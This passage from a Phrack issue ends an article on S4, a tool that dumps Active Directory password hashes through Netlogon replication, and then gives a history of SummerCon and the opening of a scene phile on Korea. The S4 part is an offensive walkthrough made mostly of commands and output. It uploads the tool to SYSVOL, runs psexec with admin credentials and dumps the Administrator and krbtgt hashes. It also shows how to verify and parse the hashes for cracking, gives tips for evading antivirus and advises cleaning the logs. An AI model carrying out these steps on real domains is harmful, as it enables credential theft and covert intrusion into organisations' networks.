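    DS_DOMAIN_CONTROLLER_INFO_2W *info = NULL;
    DWORD i, count = 0;

    if (DsBindW(NULL, domain, &hDS) != ERROR_SUCCESS)
        return;

    if (DsGetDomainControllerInfoW(hDS, domain, 2, &count,
                                   (void **)&info) == ERROR_SUCCESS) {
        for (i = 0; i < count; i++)
            wprintf(L" - DC controller %lu is %s %s\n", (unsigned long)i,
                    info[i].DnsHostName,
                    info[i].fIsPdc ? L"[PDC]" : L"");
        DsFreeDomainControllerInfoW(2, count, info);
    }
    DsUnBindW(&hDS);
}
---------------------------------------------------------------------------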
|
|
At this point, we know that DC3 is the PDC and DC4 (the only remaining DC)
|
|
is de facto a BDC. S4.exe will thus be executed from DC4, targeting DC3.
|
|
|
|
Uploading S4
|
|
++++++++++++
|
|
|
|
To run S4 on DC4, you first have to upload it. \\%DCNAME%\SYSVOL is
|
|
convenient for this purpose. To drop a file in this directory, you will use
|
|
the Domain Administrator account:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
c:\S4>hostname
|
|
WINXP
|
|
C:\S4>net use P: \\DC4\SYSVOL
|
|
Enter the user name for 'DC4': administrator
|
|
Enter the password for DC4:
|
|
The command completed successfully.
|
|
|
|
C:\S4>copy S4.exe P:\randomname.exe
|
|
1 file(s) copied.
|
|
|
|
C:\S4>net use P: /DELETE
|
|
P: was deleted successfully
|
|
---------------------------------------------------------------------------
|
|
|
|
Checking the state of the replication
|
|
+++++++++++++++++++++++++++++++++++++
|
|
|
|
It's always good to have an idea of how healthy replication is on this
Active Directory because we are about to interfere with it deeply. I've
never tested the technique in an environment prone to replication
troubles, so I recommend being careful.
|
|
|
|
First log into the BDC using psexec (or your own tool). Then use
repadmin, which will most likely be installed on the box (if not native),
as it will give you the details of the last replication operations:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
C:\S4>.\Tools\PsTools\psexec.exe \\DC4 -u FOO\administrator cmd.exe
|
|
|
|
PsExec v1.94 - Execute processes remotely
|
|
Copyright (C) 2001-2008 Mark Russinovich
|
|
Sysinternals - www.sysinternals.com
|
|
|
|
Password: ****** <-- foo123
|
|
|
|
Microsoft Windows [Version 5.2.3790]
|
|
(C) Copyright 1985-2003 Microsoft Corp.
|
|
|
|
C:\WINDOWS\system32>repadmin /showrepl *
|
|
|
|
repadmin running command /showrepl against server dc3.foo.bar
|
|
|
|
Default-First-Site-Name\DC3
|
|
DC Options: IS_GC
|
|
Site Options: (none)
|
|
DC object GUID: 265b7dba-578b-47f1-91ca-78b3019e937d
|
|
DC invocationID: 265b7dba-578b-47f1-91ca-78b3019e937d
|
|
|
|
==== INBOUND NEIGHBORS ======================================
|
|
|
|
DC=foo,DC=bar
|
|
Default-First-Site-Name\DC4 via RPC
|
|
DC object GUID: 5e66dd87-69a1-485e-8e4e-172def165b06
|
|
Last attempt @ 2012-03-21 00:32:47 was successful.
|
|
|
|
[...]
|
|
|
|
repadmin running command /showrepl against server dc4.foo.bar
|
|
|
|
Default-First-Site-Name\DC4
|
|
DC Options: (none)
|
|
Site Options: (none)
|
|
DC object GUID: 5e66dd87-69a1-485e-8e4e-172def165b06
|
|
DC invocationID: be4bbd07-2a84-4c73-a00c-8260999ea3f8
|
|
|
|
==== INBOUND NEIGHBORS ======================================
|
|
|
|
DC=foo,DC=bar
|
|
Default-First-Site-Name\DC3 via RPC
|
|
DC object GUID: 265b7dba-578b-47f1-91ca-78b3019e937d
|
|
Last attempt @ 2012-03-21 00:46:37 was successful.
|
|
|
|
[...]
|
|
C:\WINDOWS\system32>
|
|
---------------------------------------------------------------------------
|
|
|
|
This AD is healthy because no problems are reported. BTW, one little
piece of advice: avoid using your beloved MSF as a psexec-like tool
because it has a good chance of being detected by an AV.
|
|
|
|
Running S4 on the BDC
|
|
+++++++++++++++++++++
|
|
|
|
At this point, the only remaining thing to do is to run S4.exe!
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
C:\WINDOWS\system32>\\DC4\SYSVOL\randomname.exe
|
|
[!!] 3 arguments are required!
|
|
|
|
\\Vboxsvr\vmware\S4.exe -p PDC_NAME -b BDC_NAME -d DOMAIN [-P password]
|
|
|
|
OR
|
|
|
|
\\Vboxsvr\vmware\S4.exe -D -d DOMAIN
|
|
|
|
C:\WINDOWS\system32>\\DC4\SYSVOL\randomname.exe -p DC3 -b DC4 -d foo.bar
|
|
Administrator:500:6F6D84B5C1DDCB7AAAD3B435B51404EE:
|
|
23DBA86EAA18933844864F24A54EBFBF:::
|
|
Guest:501:B3CC5A77A68F6477612A53E12DFC183B:
|
|
B3CC5A77A68F6477612A53E12DFC183B:::
|
|
krbtgt:502:7396CE194FA9157E5993429157021505:
|
|
3803F74802050CE62B047668F303B453:::
|
|
SUPPORT_388945a0:1001:8FCA67CF5A9FEB7DB06FDACBE2EFDEAB:
|
|
5D798B0AB3CCC22FCD7D333D06E2D785:::
|
|
DC3$:1003:C6DD50758AC2B23B9C63DFB8BC64840C:
|
|
820B5403DF3484530F644090C564E342:::
|
|
DC3$_history_0:1003:C6DD50758AC2B23B9C63DFB8BC64840C:
|
|
9CDEE73ADFA23ED3FEC2CC575EF9D0A7:::
|
|
DC4$:1108:8C6AC94AD2F708E2AAD3B435B51404EE:
|
|
F77ACB17249932BA36990D85D0F7E01A:::
|
|
DC4$_history_0:1108:CA1CDCD62E2662912950352F77B2EC2C:
|
|
5E54C47654328C3C7B541A81D6319837:::
|
|
DC4$_history_1:1108:C233128D17B4A8C47838115D84C67E42:
|
|
F77ACB17249932BA36990D85D0F7E01A:::
|
|
---------------------------------------------------------------------------
|
|
|
|
For compatibility purposes, I kept the format used by pwdump-like tools :]
Now, just a little test to be sure that the results are not fucked. Fire
up a Python shell and compute the NT hash of the Administrator's password:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
>>> import hashlib,binascii
|
|
>>> hash = hashlib.new('md4', "foo123".encode('utf-16le')).digest()
|
|
>>> print binascii.hexlify(hash).upper()
|
|
23DBA86EAA18933844864F24A54EBFBF
|
|
>>>
|
|
---------------------------------------------------------------------------
|
|
|
|
And that's exactly the NTLM hash of the Administrator \o/
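
Since the output sticks to the classic pwdump layout, each line is simply
user:RID:LM-hash:NT-hash followed by three empty fields, so it can be fed
directly to your usual cracking tools. A trivial parsing sketch (variable
names are mine, the sample line is taken from the dump above):

---------------------------------------------------------------------------
line = ("Administrator:500:6F6D84B5C1DDCB7AAAD3B435B51404EE:"
        "23DBA86EAA18933844864F24A54EBFBF:::")
user, rid, lm_hash, nt_hash = line.split(':')[:4]
print user, rid, lm_hash, nt_hash
---------------------------------------------------------------------------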
|
|
|
|
Fixing the mess
|
|
+++++++++++++++
|
|
|
|
Now be careful with what I'm about to say because it's *very* important.
Changing a BDC's machine account password using IADsUser::SetPassword()
somehow breaks the secure channel between the BDC and the PDC. Breaking
the secure channel basically means breaking the trust between DCs,
ultimately resulting in a DoS (errors in logs, no more synchronization,
...). Oops :]
|
|
|
|
This can easily be seen by typing the command:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
C:\WINDOWS\system32>nltest /SC_CHANGE_PWD:foo.bar
|
|
I_NetLogonControl failed: Status = 5 0x5 ERROR_ACCESS_DENIED
|
|
---------------------------------------------------------------------------
|
|
|
|
The same command would *not* have failed on DC3 (or on DC4 before changing
|
|
the password). Fortunately, using the Administrator's credentials, you can
|
|
use the *very* useful netdom tool [13] to fix this problem:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
C:\WINDOWS\system32>netdom RESETPWD /Server:DC3 /UserD:Administrator
|
|
/PasswordD:*
|
|
Type the password associated with the domain user:
|
|
|
|
The machine account password for the local machine has been successfully
|
|
reset.
|
|
|
|
The command completed successfully.
|
|
|
|
C:\WINDOWS\system32>netdom RESET DC4
|
|
The secure channel from DC4 to the domain FOO has been reset. The
|
|
connection is with the machine \\DC3.FOO.BAR.
|
|
|
|
The command completed successfully.
|
|
---------------------------------------------------------------------------
|
|
|
|
Just to prove to you that the situation is indeed fixed:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
C:\WINDOWS\system32>nltest /SC_CHANGE_PWD:foo.bar
|
|
nltest /SC_CHANGE_PWD:foo.bar
|
|
Flags: 0
|
|
Connection Status = 0 0x0 NERR_Success
|
|
The command completed successfully
|
|
---------------------------------------------------------------------------
|
|
|
|
We're safe! Clean the logs and leave the box :]
|
|
|
|
|
|
---[ 7 - S4 .VS. Windows 2008 Domain Controllers
|
|
|
|
|
|
While the technique implemented in S4 is very effective if the PDC is a
Windows 2003 server, it totally fails if it's a Windows 2008 (or higher)
server, and this unfortunately holds even if the domain's functional
level is "Windows Server 2003".
|
|
|
|
The first problem that I encountered was that while I was still able to
|
|
have the new machine account's NTLM propagated, the establishment of the
|
|
secure channel always failed, an "access denied" being returned by
|
|
NetrServerAuthenticate2(). Because I suspected some evolution in the
|
|
protocol, I began to look for information on Netlogon, only to discover
|
|
that Microsoft had already published its specification [10]. My bad! If I
|
|
had been more careful I would have saved time as there was no real need to
|
|
reverse nltest.exe :] Reading the specifications, I discovered something
|
|
really interesting that I had failed to notice through the reversing
|
|
process: there are different algorithms to compute the session key.
|
|
|
|
Long story short, when a client initiates a connection to the server, it
first provides its capabilities using the NegotiateFlags parameter of
NetrServerAuthenticate(). In return, the server sets this parameter to
advertise its own capabilities. This is how the two sides agree on the
algorithm used to compute the session key.
|
|
|
|
There are basically three types of session keys (see section 3.1.4.3 of
|
|
[10]):
|
|
|
|
1/ AES (strong)
|
|
2/ 'Strong-Key' which is HMAC-MD5 based (weaker)
|
|
3/ DES (weak)
|
|
|
|
The third one is implemented in S4's NlMakeSessionKey() and is also the
oldest. For compatibility purposes, Windows 2003 still accepts this weak
way of computing keys, which explains why the authentication process was
OK. Starting with Windows 2008, security has been enhanced and the
minimum required by default is now Strong-Key; I implemented it and the
authentication is now compatible with Windows 2008 :]
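
For the curious, the Strong-Key derivation described in section 3.1.4.3
of [10] boils down to an HMAC-MD5, keyed with the machine account's NT
hash, of the MD5 of four zero bytes followed by the two 8-byte challenges
exchanged during NetrServerReqChallenge(). The sketch below follows my
reading of the spec, not S4's code, so double-check it against [10]
before relying on it:

---------------------------------------------------------------------------
import hashlib, hmac

def nt_owf(password):
    # MD4 of the UTF-16LE password, i.e. the machine account's NT hash
    return hashlib.new('md4', password.encode('utf-16le')).digest()

def strong_session_key(machine_nt_hash, client_chall, server_chall):
    # both challenges are the 8-byte values from NetrServerReqChallenge()
    digest = hashlib.md5('\x00' * 4 + client_chall + server_chall).digest()
    return hmac.new(machine_nt_hash, digest, hashlib.md5).digest()

# placeholder values, not real traffic
key = strong_session_key(nt_owf("foo123"), 'A' * 8, 'B' * 8)
print key.encode('hex').upper()        # the 16-byte session key
---------------------------------------------------------------------------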
|
|
|
|
<Note>
|
|
There exists a workaround (Hi D.) to keep using a weak DES session key with
|
|
a Windows 2008 server. Google() the key words "NT4Emulator" and
|
|
"AllowNT4Crypto" for more details (also have a look at the GPO).
|
|
</Note>
|
|
|
|
Unfortunately this was not sufficient as NetrDatabaseSync() was now
|
|
returning a STATUS_NOT_SUPPORTED. Digging in "[MS-NRPC]: Netlogon Remote
|
|
Protocol Specification" I found the following explanation (rev 24):
|
|
|
|
-----------------------[ MS official documentation ]-----------------------
|
|
If a server does not support a specific Netlogon RPC method, it MUST return
|
|
ERROR_NOT_SUPPORTED or STATUS_NOT_SUPPORTED, based on the return type
|
|
---------------------------------------------------------------------------
|
|
|
|
The revision is important because NetrDatabaseSync() is documented in
revision 22 whereas it no longer is in revision 24. It mysteriously
disappeared... If we consider the previous quote, it seems fair to assume
that at some point the function was declared deprecated. Unfortunately,
the reason is probably mentioned in revision 23, which seems currently
unavailable. Who knows, we might some day get the appropriate
explanation. However "deprecated" doesn't mean "gone", so it *might* be
interesting to reverse engineer the function ;]
|
|
|
|
Btw a little trick to help you:
|
|
|
|
------------------------------[ screendump ]-------------------------------
|
|
C:\Users\Administrator>nltest /dbflag:ffffffff
|
|
SYSTEM\CurrentControlSet\Services\Netlogon\Parameters set to 0xffffffff
|
|
Flags: 0
|
|
Connection Status = 0 0x0 NERR_Success
|
|
The command completed successfully
|
|
|
|
C:\Users\Administrator>type %WINDIR%\debug\netlogon.log
|
|
[...]
|
|
04/04 22:23:34 [ENCRYPT] NetrLogonComputeServerDigest: 1105: DC10$: Message
|
|
: dbcbaafc aba49ab9 f6bcabb5 62380816 ..............8b
|
|
04/04 22:23:34 [ENCRYPT] NetrLogonComputeServerDigest: 1105: New Password:
|
|
b6b852a3 5ec54dc9 9ea3917e c51d19fa .R...M.^~.......
|
|
04/04 22:23:34 [ENCRYPT] NetrLogonComputeServerDigest: 1105: New Digest: d4
|
|
67786d a92bd731 7da18262 3d1cdb4f mxg.1.+.b..}O..=
|
|
04/04 22:23:34 [ENCRYPT] NetrLogonComputeServerDigest: 1105: Old Password:
|
|
b6b852a3 5ec54dc9 9ea3917e c51d19fa .R...M.^~.......
|
|
04/04 22:23:34 [ENCRYPT] NetrLogonComputeServerDigest: 1105: Old Digest: d4
|
|
67786d a92bd731 7da18262 3d1cdb4f mxg.1.+.b..}O..=
|
|
[...]
|
|
---------------------------------------------------------------------------
|
|
|
|
|
|
---[ 8 - Additional details
|
|
|
|
|
|
a) Are there other alternatives to dump the AD's passwords?
|
|
|
|
Well apart from pwdump-like techniques, there is at least one more:
ntds.dit [11] file dumping. In a nutshell, this file is a Jet Blue (ESE)
database holding (amongst other things) information about the users. When
an LDAP query is issued, this database is interrogated. Because it's very
sensitive (passwords are stored inside), it's both encrypted and locked
by the system, so it's not trivial to dump its content. Until recently I
wasn't aware of any tool able to deal with it. It seems that things have
changed because I've heard some rumors. There should be at least two
other alternatives, but I won't say more. Be smart and find them
yourself :]
|
|
|
|
b) What about real-life filtering & the requirement of 2 DCs??
|
|
|
|
The first requirement for the attack is the ability to execute arbitrary
|
|
commands on one of the DCs. One is enough as by design all of them are
|
|
communicating with one another without any restrictions (=filtering).
|
|
|
|
The second requirement is the existence of at least 2 DCs. Apart from tiny
|
|
corporations, there will always be at least 2 DCs (for business continuity
|
|
in case of a disaster or maintenance operation) so it's no big deal either.
|
|
|
|
|
|
c) What about Samba 4 .VS. Windows 2008?
|
|
|
|
Well, have a look at samba-4.0.0alpha18.tgz :]
|
|
|
|
|
|
---[ 9 - Last words
|
|
|
|
|
|
The original title of the paper was something like:
|
|
"The art of the laziness: exploiting the Samba 4 project"
|
|
|
|
What I wanted to highlight is that sometimes with only a few ideas and
|
|
minimal effort you can come up with new tools & techniques. Read the S4
|
|
source code, test it, improve it and use it wisely. As they all say:
|
|
|
|
Happy Hacking! :-]
|
|
|
|
-- High 5 to my fellows
|
|
|
|
---[ 10 - Bibliography
|
|
|
|
|
|
[01] http://en.wikipedia.org/wiki/Pwdump
|
|
[02] http://en.wikipedia.org/wiki/Active_Directory
|
|
[03] http://wiki.samba.org/index.php/Samba4
|
|
[04] http://securite.intrinsec.com/2010/09/07/
|
|
rd-outil-dextraction-de-mots-de-passe-ad/
|
|
[05] http://msdn.microsoft.com/en-us/library/cc237290%28v=prot.13%29.aspx
|
|
[06] http://en.wikipedia.org/wiki/Primary_Domain_Controller
|
|
[07] http://www.microsoft.com/download/en/details.aspx?id=16770
|
|
[08] http://msdn.microsoft.com/en-us/library/cc237225%28v=prot.13%29.aspx
|
|
[09] http://msdn.microsoft.com/en-us/library/cc237082%28v=prot.13%29.aspx
|
|
[10] http://msdn.microsoft.com/en-us/library/cc237008%28v=prot.10%29.aspx
|
|
[11] http://www.stoyanoff.info/blog/2012/02/11/ad-data-store-part-1/
|
|
[12] http://en.wikipedia.org/wiki/Flexible_single_master_operation
|
|
[13] http://technet.microsoft.com/en-us/library/cc772217%28v=ws.10%29.aspx
|
|
[14] http://technet.microsoft.com/en-us/library/cc776877%28WS.10%29.aspx
|
|
|
|
|
|
---[ 11 - c0de: S4
|
|
|
|
---[ EOF
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x12 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=----------------------=[ 25 Years of SummerCon ]=----------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=---------------------------=[ by Shmeck ]=-----------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
It's hard to believe that 2012 marks the 25th anniversary of SummerCon. In
|
|
the American hacking landscape, SummerCon remains the seminal conference
|
|
on which all others are modeled. In those early days, interactions
|
|
between hackers took place through BBSes, as shout-outs in assorted
|
|
textfiles, on telco voice bridges, and in the pages of Phrack and 2600. For
|
|
the most part, these interactions were all mediated through some kind of
|
|
communications infrastructure. SummerCon was an opportunity to change that.
|
|
|
|
In the 1980s, informal gatherings of hackers had begun to spring up all
|
|
over the place in America. The European scene was well-organized, with
|
|
groups like the Chaos Computer Club holding an annual congress of hackers
|
|
as early as 1984.
|
|
|
|
There are various theories about why Europe organized more quickly than
|
|
America. America developed a strong counterculture in the 1960s and 1970s,
|
|
including an enthusiastic phreaking movement dating back to the early
|
|
1970s. Well-known anarchist and Chicago Seven conspirator Abbie Hoffman,
|
|
along with Al Bell, a well-known telephony enthusiast, launched the first
|
|
phreak magazine, YIPL: Youth International Party Line in 1971. YIPL became
|
|
TAP, based out of New York. Though Americans were enthusiastic, TAP found
|
|
an eager European audience, and Dutch and German activists carried the
|
|
torch and pushed the boundaries of phreaking in the 1970s. Those phreaks
|
|
were readily absorbed into the ranks of an already strong and
|
|
well-established anti-authoritarian movement in Europe. Large-scale
|
|
meetings, complete with technical demonstrations were the logical next
|
|
step, so the first big hacker conference, Chaos Computer Congress, took
|
|
place in Hamburg in 1984.
|
|
|
|
American hackers remained active during that period, but physical meetings
|
|
remained elusive. Nevertheless, something like a tipping point for the
|
|
American hacking scene must have occurred in the summer of 1987. On June 5
|
|
of that year, the first 2600 meeting was held in New York City. Only two
|
|
weeks later, in St. Louis, a small cadre of people who mostly knew each
|
|
other from exchanges on Metal Shop BBS and through Phrack profiles, met at
|
|
the Executive International Best Western to embark on a totally new way to
|
|
advance the American hacking agenda. The first SummerCon set the stage for
|
|
the way subsequent hacker conferences would be held. To this day PumpCon,
|
|
HoHoCon, DEFCON, and HOPE stick to the same formula.
|
|
|
|
Its organizers wanted to foster physical interaction in meatspace,
eschewing the phosphorescent glow of their CRTs to hold a party like none
other. Mostly, though, if the reports from early editions of Phrack are
to be believed, it was to have a good time.
|
|
primary goal as forging friendships, because that's how real dialogue and
|
|
information exchange happens. Yes, there were technical talks. That first
|
|
SummerCon in 1987 included a long list of technical discussions, but
|
|
because it was a small gathering, the agenda was ad hoc and seemingly
|
|
freeform.
|
|
|
|
Most of the technical discussions centered on things that are pretty far
|
|
outside modern mainstream infosec discourse: BBSes, fiber optics, and
|
|
methods of blowing 2600 Hertz headlined the proceedings. In fact, the
|
|
attendees had a hard time getting started, not really knowing each other or
|
|
how to begin. But because everyone in attendance had some sort of technical
|
|
background, these purely technical discussions got people talking to each
|
|
other, which led to drinking, which led to partying, which ultimately
|
|
helped the attendees forge long-lasting relationships with each other. It's
|
|
how cons have worked ever since.
|
|
|
|
The success of that first SummerCon naturally implied that another one
|
|
would be held the following year. Its organizers made a last-minute
|
|
decision to hold another one. Like modern incarnations of SummerCon, the
|
|
organizers dithered over details like location, letting inertia play a
|
|
significant role. While New York City was one possible contender, it was
|
|
held in St. Louis again.
|
|
|
|
SummerCon '88 was a controversial one. The technical discussions came a
|
|
little more easily, and the attendees seemed a little more comfortable,
|
|
inviting outsiders into their ranks. But one attendee, Dale Drew, using the
|
|
handle "The Dictator", was actually an informant working with the Secret
|
|
Service. He helped government agents videotape the proceedings through a
|
|
two-way mirror in his hotel room. This video evidence was eventually used
|
|
to indict conference organizer Knight Lightning (the nom de hack of Phrack
|
|
founder Craig Neidorf) on a federal count of criminal conspiracy as a part
|
|
of his now-infamous E911 criminal trial. Though the case against Neidorf
|
|
eventually fell apart, federal interest in SummerCon would remain an
|
|
ongoing theme for years to come. Other conferences have capitalized on
|
|
SummerCon mainstays like "Hunt the Fed", now immortalized as DEFCON's "Spot
|
|
the Fed" contest.
|
|
|
|
There was a SummerCon in 1990, but a wide federal dragnet for computer
|
|
crime and Knight Lightning's federal trial tainted it. Perhaps the most
|
|
chilling reminder of a bad era exists in the announcement for a
|
|
Christmastime event in Houston called XmasCon, which stated that their event
|
|
would "replace the painful memories of SummerCon'90 (SCon'90? What do you
|
|
mean? there was a SummerCon this year? HA. It surprised me too)." Clearly,
|
|
these were bad times in the hacker community.
|
|
|
|
In 1991, the freshly acquitted Knight Lightning rebranded SummerCon as
|
|
"CyberView," because he did not want to trigger any associations with the
|
|
previous event. Bruce Sterling's comprehensive report (Phrack 33:10,
|
|
http://www.phrack.org/issues.html?issue=33&id=10#article) included a
|
|
rationale for the new, if short-lived name. "The convention hotel, a seedy
|
|
but accommodating motor-inn outside the airport in St Louis, had hosted
|
|
SummerCons before. Changing the name had been a good idea. If the staff
|
|
were alert, and actually recognized that these were the same kids back
|
|
again, things might get hairy." In what can only be described as a
|
|
SummerCon miracle, a St. Louis swingers' group simultaneously occupied the
|
|
conference hotel. As with every SummerCon, booze was a factor.
|
|
|
|
SummerCon 92 saw a dramatic increase in the number of participants, with 73
|
|
reportedly in attendance. Summercon 93 was the last year a SummerCon took
|
|
place in St. Louis. Summercon 95 marked a changing of the guard, with the
|
|
event taking place in Atlanta, hosted by Erik Bloodaxe and his LoD
|
|
colleagues. Over 200 hackers came; several were arrested. The following
|
|
year, SummerCon 96 moved to Washington, DC.
|
|
|
|
Periodically moving the conference became a ritual to prevent the event
|
|
from getting too stale and to ensure that a willing hotel could be found,
|
|
since SummerCon had a reputation of being a rowdy conference. The move to
|
|
Washington, D.C. offered an easy venue for members of the East Coast hacker
|
|
community; members of L0pht came in from Boston, hackers from Pittsburgh
|
|
had a simple commute, and the NYC scene was well represented. The local law
|
|
enforcement community was in full force as well, with several raids taking
|
|
place during the event.
|
|
|
|
During that time period, the organizers of SummerCon were losing enthusiasm
|
|
for running the event. It is a thankless job, and requires coordinating a
|
|
tremendous number of people, places, and event staff, all while keeping law
|
|
enforcement officials at bay. During Summercon 97 in Atlanta, a stalwart of
|
|
the DC hacking community going by the handle Clovis convinced the current
|
|
organizers to transfer the domain name to him so that he could take over
|
|
the organizational aspects of the conference. It was a relief to the
|
|
current organizers, who were frankly happy to be done with the annual
|
|
headache.
|
|
|
|
In 1998, Clovis, leaning heavily on his younger brother for organizational
|
|
support, threw SummerCon in Atlanta. For the next three years, SummerCon
|
|
would be held in Atlanta, though SummerCon 2000 was notable because the
|
|
hotel that was slated to host it conveniently lost the contracts for the
event the day before it was to take place, leaving Clovis no rooms for
technical discussions. The nonplussed attendees set up shop in the Omni
CNN Center Hotel bar, where ad hoc presentations took place, much to the
consternation of hotel guests who did not expect to get a dose of
information security discourse over their cocktails. The hotel that had
originally objected to hosting a hacker conference did not mind the
steady stream of bar sales one bit.
|
|
|
|
Clovis had ambitious plans for SummerCon. For 2001, he envisioned a global
|
|
conference, which would draw an audience from around the world. He thought
|
|
Amsterdam would be a good location, and looked into bulking up the
|
|
technical backend of the event. For the first time SummerCon would be shown
|
|
live through a RealStream video server to anyone who wanted to watch.
|
|
|
|
It was daunting. Everything was expensive. Clovis' younger brother had to
|
|
figure out a mountain of customs paperwork to ship all the t-shirts and
|
|
conference badges overseas. In short, every part of SummerCon 2001 was an
|
|
enormous headache, but in the end it was a fantastic event.
|
|
|
|
About 200 attendees descended on Amsterdam to try an American-style hacker
|
|
conference. It was very different from the Chaos Computer Club congresses,
|
|
and nothing at all like the Dutch hacking camp HAL. Many attendees didn't
|
|
understand why it was held at such an expensive hotel. But the global
|
|
breadth of attendees and speakers was impressive, and it was generally
|
|
considered to be a successful conference by all who attended or watched
|
|
online. The hotel, though pricey, was incredibly easy to work with and
|
|
provided a safe, enjoyable environment in a tourist-friendly part of
|
|
Amsterdam.
|
|
|
|
But Clovis' brother, weary from filling out customs forms, was not so
|
|
enamored with the idea of doing SummerCon overseas again, and so SummerCon
|
|
2002 took place in Washington, D.C. Unlike the affable and easy-going Dutch
|
|
hotel support staff a year prior, the sales director of the Renaissance
|
|
Washington D.C. had little patience for the SummerCon organizers. Not
|
|
mincing words, she announced to Clovis and his staff, "I know about you
|
|
guys. I know about hacker conferences. If anything happens at this hotel,
|
|
any kind of funny business, I will throw you all out. We have Presidents of
|
|
the United States here. I will throw you out." This was six hours before
|
|
the conference was slated to begin. In spite of her concerns, the
|
|
conference was successful, the hotel bar did brisk business, and nobody got
|
|
arrested.
|
|
|
|
SummerCon enjoyed a stand in Pittsburgh for two years where Redpantz became
|
|
a member of the planning committee and began to emcee. In these years,
|
|
SummerCon began to select venues based on how agreeable the bar staff was,
|
|
because, all things being equal, SummerCon is, in the words of the noted
|
|
hacker X, "also about drinking a lot of beer." There were several alcohol
|
|
related incidents in Pittsburgh. One of the organizers was cited by the
|
|
Pittsburgh Police Department for "simulating a sex act," an incident that
|
|
he has never lived down. It was in this time period that members of the FBI
|
|
Cyber Division began to actually offer presentations at SummerCon. If you
|
|
can't beat 'em, join 'em.
|
|
|
|
Austin was the site of SummerCon 2005. Internal political squabbling
|
|
amongst the organizers and the lack of a clear promotional plan for
|
|
SummerCon meant that attendance was very low, perhaps even lower than at
the first SummerCon. It was a boozy event and had plenty of quality
technical discussions, but only a few people showed up, including some
very nice individuals from San Antonio. Luckily, the hotel was also
packed with bikers from the annual Republic of Texas motorcycle rally,
and everyone was
|
|
down to party.
|
|
|
|
Nevertheless, the organizers knew it was time to press the reset button,
|
|
and a select group was invited to SummerCon 2006 to address the ongoing
|
|
viability of the event. The organizational core agreed that the next three
|
|
years should be in Atlanta, with every effort taken to rebuild the
reputation of SummerCon. That effort to rejuvenate its reputation as the
hacker conference with the highest level of technical expertise, coupled
with the heaviest intake of alcohol per attendee, was well received by the
|
|
organizational core and future attendees. It was an old formula, and a
|
|
return to our roots: offer great presentations to get the conversation
|
|
going, and keep everyone as drunk as possible.
|
|
|
|
SummerCons in Atlanta were predictably rowdy; in 2007 Billy Hoffman did his
|
|
best to finish his presentation, and slurred the words, "If I'm not making
|
|
any sense ya'll just throw a shoe at me or something." Immediately, an
|
|
attendee threw a shoe that barely missed the staggering speaker, making a
|
|
loud WHUMP as it struck the projection screen. "Well, okay then..." Billy
|
|
replied, as he continued his lecture. The SummerCon organizational staff
|
|
believes that this exchange was the framework for an event that transpired
|
|
in Iraq in 2008, when an angry man threw his shoes at a surprised President
|
|
George W. Bush.
|
|
|
|
When SummerCon moved to New York City in 2010, it had a reputation as a
|
|
technical smorgasbord and a relentless booze-fest, which, honestly, is a
|
|
perfect combination. There are very few things you can do to improve on
|
|
that formula, but the SummerCon organizers found a way, by inviting a
|
|
burlesque troupe to participate in event planning and hosting an after
|
|
party.
|
|
|
|
Being located in New York City opened the event to heavy-hitters in the
|
|
security industry, and the technical aspects of the conference expanded in
|
|
line with the party dynamic. In 2011, the organizers accepted some
|
|
sponsorship money, which permitted them to invest more heavily in the
|
|
presentation side of the event, flying in speakers from far-flung and
|
|
exotic places like California and Michigan. It also meant that the after
|
|
party was more outrageous, and was featured as an "Event of the Week" in
|
|
the local events newsletter "Time Out New York."
|
|
|
|
There are few things as dependable in the hacking world as SummerCon.
|
|
Though it has evolved from a small, invite-only gathering to a large,
|
|
structured conference, it has never lost sight of the importance of its
|
|
mission: bringing together the brightest minds in information security for
|
|
the best party of the year. Raise your glass, and toast another 25 years of
|
|
Summercon!
|
|
|
|
[EOF]
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x13 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=----------------------=[ International scenes ]=-----------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------------=[ By Various ]=------------------------=|
|
|
|=------------------------=[ <various@nsa.gov> ]=------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
In this issue we are glad to have an amazing scene phile about Korea. You
|
|
may find that it is a bit different from the usual scene philes, but the
|
|
content will reward you. The author gives us information that is hard to
|
|
come by and insight that illuminates widely believed misconceptions about
|
|
Korea. We also have the second part of the Greek scene phile that covers
|
|
interesting stories from that country's past. We know that Greece goes
|
|
through tough times and we hope it will make people reflect on the
|
|
situation there.
|
|
|
|
Trying to define 'a scene' is not unlike trying to define what
|
|
'the Underground' is. Perhaps it is that fleeting moment where you feel a
|
|
connection with something. A connection that transcends physical
|
|
limitations and relies only on interest and passion for, well, for anything
|
|
really.
|
|
|
|
The definition of the word 'scene' has changed quite a lot. Some years ago
|
|
the word 'scene' had a geographical connotation. That's clearly no longer
|
|
the case. Scenes are becoming increasingly, and thankfully, untethered from
|
|
physical boundaries. That's not really something new, but it has changed
|
|
the way most scenes are organized and operate.
|
|
|
|
Given that physical boundaries no longer are the central defining factor of
|
|
scenes, should Phrack continue to publish scene philes of specific
|
|
countries? Maybe the next logical step is to focus on scenes that are
|
|
defined by field, topic or interest. Maybe Phrack's 'International Scenes'
|
|
section should be changed to simply 'Scenes' and present overviews of less
|
|
known sub-scenes or communities built around specific interests.
|
|
|
|
Gentle reader, what are your thoughts?
|
|
|
|
-- The Phrack Staff
|
|
|
|
|
|
---
|
|
|
|
|
|
Some Stories in Korea
|
|
|
|
|
|
|
|
1 - Introduction
|
|
|
|
2 - Internet of North Korea
|
|
|
|
3 - Cyber capabilities of North Korea
|
|
|
|
4 - Attacks against South Korea
|
|
4.1 - 7.7 DDoS attack
|
|
4.2 - 3.4 DDoS attack
|
|
|
|
5 - Who are attackers?
|
|
|
|
6 - Some prospects
|
|
|
|
7 - References
|
|
|
|
|
|
|
|
--[ 1 - Introduction
|
|
